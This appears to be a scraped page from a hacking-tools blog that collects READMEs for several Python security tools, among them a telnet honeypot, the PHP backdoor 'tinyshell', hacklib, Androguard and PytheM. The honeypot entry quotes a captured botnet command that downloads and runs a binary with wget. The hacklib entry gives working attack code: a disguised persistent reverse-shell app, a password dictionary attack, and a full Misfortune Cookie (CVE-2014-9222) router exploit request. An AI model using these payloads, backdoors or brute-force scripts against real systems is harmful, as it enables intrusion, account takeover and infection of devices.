Python Telnet Honeypot For Catching Botnet Binaries - Telnet IoT Honeypot

This project implements a python telnet server trying to act as a honeypot for IoT Malware which spreads over horribly insecure default passwords on telnet servers on the internet.

Other than https://github.com/stamparm/hontel or https://github.com/micheloosterhof/cowrie (examples), which provides full (via chroot) or simulated behaviour of a linux system this honeypots goal is just to collect statistics of (IoT) botnets. This means that the honeypot must be made to work with every form of automated telnet session, which may try to infect the honeypot with malware. Luckily, these malwares infection processes are quite simple, just using wget do download something and running it.

Architekure

The application has a client/server architekture, with a client (the actual honeypot) accepting telnet connections and a server aggregating connection data and sample analysis.

However, for local deployments, the application can also be run in local mode to eliminate the need to run a client and server locally.

Running

The application has a config file named config.py. Samples are included for local and client/server deployments.

Client/Local Mode

python honey.py

Server

python backend.py

Opening the frontend
After the server is started, open html/index.html in your favorite browser. For this to work, the url in html/apiurl.js should point to your running backend, which it should do automatically for local deployments.

Sample Connection

enable
shell
sh
cat /proc/mounts; /bin/busybox PEGOK
cd /tmp; (cat .s || cp /bin/echo .s); /bin/busybox PEGOK
nc; wget; /bin/busybox PEGOK
(dd bs=52 count=1 if=.s || cat .s)
/bin/busybox PEGOK
rm .s; wget http://example.com:4636/.i; chmod +x .i; ./.i; exit 

Images

Download Telnet IoT Honeypot

Read More

The Hacker's ToolBox - PloitKit

PloitKit is a Python based GUI tool designed as one-stop for all other softwares. I was facing these kinds of problem, when I need to switch to different system, or I lost my pen-drive. I have to go to google, and search every tool and download every tool and so on. So I decided to create a tool, in which I just click and click and tool is there.

I have added more than 900+ tools in this tool, but only 400+ is available now, to test will this tool work, if it works I'll make it available for everyone.

Features

1. Auto-Update - No need to come over here, and look for new version every time.
2. Better Error Handling - Some tools may cause error, that's why I added this option.
3. Graphical Interface - For just click & click.
4. Malware Protectiong - All tools are downloaded from their original source, so no malwares or any viruses.
5. Multi-Platform - Many tools are for designed differently for Mac, Windows & Linux, so I added option for that. Choose your platform and you're good to go.
6. Better organised - Everything is better organised nothing like search everything, and all that mess.

I believe that, nothing can't be perfect, So I added option to report a tool, or send me suggestions about any new tool, I should add.

Usage

git clone https://github.com/rajeshmajumdar/PloitKit.git

Windows

ploitkit.py

UNIX or Mac

python ploitkit.py

Download PloitKit

Read More

Python Client with PHP Shell - tinyshell

python Client with php shell , allows to connect and send commands over current protocol using POST and GET Requests

Features

1. connect with direct session with no need for reverse connection .
2. support password protection .
3. can be binded to any file with no damage .
4. using GET/POST request with error handling .

Usage
the project contains of two files :

1. Remote shell python file : considered as Client to connect with target python remote shell.py url password
   
2. php shell php file : considered as php backdoor . password can be edited manually by modifing the code .
   

Credits
Lawrence Amer - Vulnerability Lab Researcher .

Video

Download tinyshell

Read More

Pentesting, Port Scanning, and Logging in anywhere with Python - hacklib

Toolkit for hacking enthusiasts using Python.
hacklib is a Python module for hacking enthusiasts interested in network security. It is currently in active development.

Installation
To get hacklib, simply run in command line:

pip install hacklib

hacklib also has a user interface. To use it, you can do one of the following:
Download hacklib.py and run in console:

python hacklib.py
----------------------------------------------
Hey. What can I do you for?


Enter the number corresponding to your choice.

1) Connect to a proxy
2) Target an IP or URL
3) Lan Scan
4) Create Backdoor
5) Server
6) Exit

Or if you got it using pip:

import hacklib
hacklib.userInterface()

Dependencies
Not all classes have external dependencies, but just in case you can do the following:

hacklib.installDependencies()

Usage Examples
Reverse shell backdooring (Currently only for Macs):

import hacklib

bd = hacklib.Backdoor()
# Generates an app that, when ran, drops a persistent reverse shell into the system.
bd.create('127.0.0.1', 9090, 'OSX', 'Funny_Cat_Pictures')
# Takes the IP and port of the command server, the OS of the target, and the name of the .app

Generated App:
Listen for connections with Server:

>>> import hacklib
>>> s = hacklib.Server(9090) # Bind server to port 9090
>>> s.listen() 
New connection ('127.0.0.1', 50011) # Target ran the app (connection retried every 60 seconds)
bash: no job control in this shell
bash$ whoami # Type a command
leon
bash$ # Nice!

Universal login client for almost all HTTP/HTTPS form-based logins and HTTP Basic Authentication logins:

import hacklib

ac = hacklib.AuthClient()
# Logging into a gmail account
htmldata = ac.login('https://gmail.com', 'email', 'password')

# Check for a string in the resulting page
if 'Inbox' in htmldata: print 'Login Success.'
else: print 'Login Failed.'

# For logins using HTTP Basic Auth:
try: 
    htmldata = ac.login('http://somewebsite.com', 'admin', 'password')
except: pass #login failed

Simple dictionary attack using AuthClient:

import hacklib

ac = hacklib.AuthClient()
# Get the top 100 most common passwords
passwords = hacklib.topPasswords(100)

for p in passwords:
    htmldata = ac.login('http://yourwebsite.com/login', 'admin', p)
    if htmldata and 'welcome' in htmldata.lower():
        print 'Password is', p
        break

Port Scanning:

from hacklib import *

ps = PortScanner()
ps.scan(getIP('yourwebsite.com'))
# By default scans the first 1024 ports. Use ps.scan(IP, port_range=(n1, n2), timeout=i) to change default

# After a scan, open ports are saved within ps for reference
if ps.portOpen(80):
    # Establish a TCP stream and sends a message
    send(getIP('yourwebsite.com'), 80, message='GET HTTP/1.1 \r\n')

Misfortune Cookie Exploit (CVE-2014-9222) using PortScanner:

>>> import hacklib

# Discovery
>>> ps = hacklib.PortScanner()
>>> ps.scan('192.168.1.1', (80, 81))
Port 80:
HTTP/1.1 200
Content-Type: text/html
Transfer-Encoding: chunked
Server: RomPager/4.07 UPnP/1.0
EXT:
# The banner for port 80 shows us that the server uses RomPager 4.07. This version is exploitable.

# Exploitation
>>> payload = '''GET /HTTP/1.1
Host: 192.168.1.1
User-Agent: googlebot
Accept: text/html, application/xhtml+xml, application/xml; q=09, */*; q=0.8
Accept-Language: en-US, en; q=0.5
Accept-Encoding: gzip, deflate
Cookie: C107351277=BBBBBBBBBBBBBBBBBBBB\x00''' + '\r\n\r\n'
>>> hacklib.send('192.168.1.1', 80, payload)
# The cookie replaced the firmware's memory allocation for web authentication with a null bye.
# The router's admin page is now fully accessible from any web browser.

FTP authentication:

import hacklib
ftp = hacklib.FTPAuth('127.0.0.1', 21)
try:
    ftp.login('username', 'password')
except:
    print 'Login failed.'

Socks4/5 proxy scraping and tunneling:

>>> import hacklib
>>> import urllib2
>>> proxylist = hacklib.getProxies() # scrape recently added socks proxies from the internet
>>> proxy = hacklib.Proxy()
>>> proxy.connect(proxylist) # automatically find and connect to a working proxy in proxylist
>>> proxy.IP
u'41.203.214.58'
>>> proxy.port
65000
>>> proxy.country
u'KE'
# All Python network activity across all modules are routed through the proxy:
>>> urllib2.urlopen('http://icanhazip.com/').read() 
'41.203.214.58\n'
# Notes: Only network activity via Python are masked by the proxy.
# Network activity on other programs such as your webbrowser remain unmasked.
# To filter proxies by country and type:
# proxylist = hacklib.getProxies(country_filter = ('RU', 'CA', 'SE'), proxy_type='Socks5')

Word Mangling:

from hacklib import *

word = Mangle("Test", 0, 10, 1990, 2016)

word.Leet()
word.Numbers()
word.Years()

Output:

T3$t
Test0
0Test
...snip...
Test10
10Test
Test1990
1990Test
...snip...
Test2016
2016Test

Pattern Create:

from hacklib import *

Pattern = PatternCreate(100)

Pattern.generate()

Output:

Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A

Pattern Offset:

from hacklib import *

Offset = PatternOffset("6Ab7")

Offset.find()

Output:

[+] Offset: 50

Download python-hacklib

Read More

Reverse engineering, Malware analysis of Android applications - Androguard

Reverse engineering, Malware and goodware analysis of Android applications ... and more (ninja !)

Features
Androguard is a full python tool to play with Android files.

•  Map and manipulate DEX/ODEX/APK/AXML/ARSC format into full Python objects, 
•  Diassemble/Decompilation/Modification of DEX/ODEX/APK format, 
•  Decompilation with the first native (directly from dalvik bytecodes to java source codes) dalvik decompiler (DAD), 
•  Access to the static analysis of the code (basic blocks, instructions, permissions (with database from http://www.android-permissions.org/) ...) and create your own static analysis tool, 
•  Analysis a bunch of android apps, 
•  Analysis with ipython/Sublime Text Editor, 
•  Diffing of android applications, 
•  Measure the efficiency of obfuscators (proguard, ...), 
•  Determine if your application has been pirated (plagiarism/similarities/rip-off indicator), 
•  Check if an android application is present in a database (malwares, goodwares ?), 
•  Open source database of android malware (this opensource database is done on my free time, of course my free time is limited, so if you want to help, you are welcome !), 
•  Detection of ad/open source librairies (WIP), 
•  Risk indicator of malicious application, 
•  Reverse engineering of applications (goodwares, malwares), 
•  Transform Android's binary xml (like AndroidManifest.xml) into classic xml, 
•  Visualize your application with gephi (gexf format), or with cytoscape (xgmml format), or PNG/DOT output, 
•  Integration with external decompilers (JAD+dex2jar/DED/fernflower/jd-gui...) 

1. ScreenShots

Download Stable Release

Read More

Tool for Injecting Malicious Payloads Into Barcodes - Scansploit

Tool for Injecting Malicious Payloads Into Barcodes 

ºBarcodes (code128)
ºQRCodes
ºDataMatrix
ºEAN13


Requirements 

ºPython3
ºPyStrich

ºpip3 install pystrich
ºIncase of jpeg error: sudo apt-get install libtiff5-dev zlib1g-dev libfreetype6-dev liblcms2-dev libwebp-dev tcl8.6-dev tk8.6-dev python-tk

Pillow

ºpip3 install pillow

Download Scansploit

Read More

Python Network Pentesting Tool - Pythem

PytheM is a python network/pentesting tool. Same has been developed in the hope that it will be useful and i don't take responsabillity of any misapplication of it. Only for GNU/Linux OS.

Installation

$sudo git clone https://github.com/m4n3dw0lf/PytheM/ 
$cd PytheM 
$sudo pip install -r requirements.txt 
$sudo ./pythem

Features

• [Brute-Force]
• [Man-In-The-Middle]:
• [Remote]:
• [Sniffing]:
• [Scanning]:
• [Web]:
• [Wireless]:

Download Pythem

Read More